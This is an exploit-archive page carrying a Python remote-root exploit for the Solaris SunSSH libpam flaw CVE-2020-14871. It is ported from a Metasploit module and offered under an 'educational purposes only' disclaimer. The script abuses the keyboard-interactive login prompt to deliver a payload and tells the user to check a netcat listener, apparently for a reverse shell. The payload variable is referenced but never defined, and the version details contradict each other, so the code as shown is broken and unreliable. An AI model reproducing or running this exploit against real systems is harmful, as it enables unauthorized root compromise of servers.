Solaris sunssh 11.0 x86 libpam remote root (2) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-05-21 |
Type : remote |
Platform : solaris
This exploit / vulnerability Solaris sunssh 11.0 x86 libpam remote root (2) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root (2)
# Original Exploit Author: Hacker Fantastic
# Metasploit Module Author: wvu
# Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris10-overview.html
# Version: 10
# Tested on: SunOS solaris 10
# CVE: CVE-2020-14871
# Ported By: legend
import socket
import paramiko
from time import sleep
print("Length => %d" % (len(payload)))
def inter_handler(title, instructions, prompt_list):
resp = [] #Initialize the response container
for pr in prompt_list:
print(pr)
if pr[0].startswith('Please enter user name:'):
sleep(10)
resp.append(payload)
print("Your payload is sended check your nc")
return tuple(resp)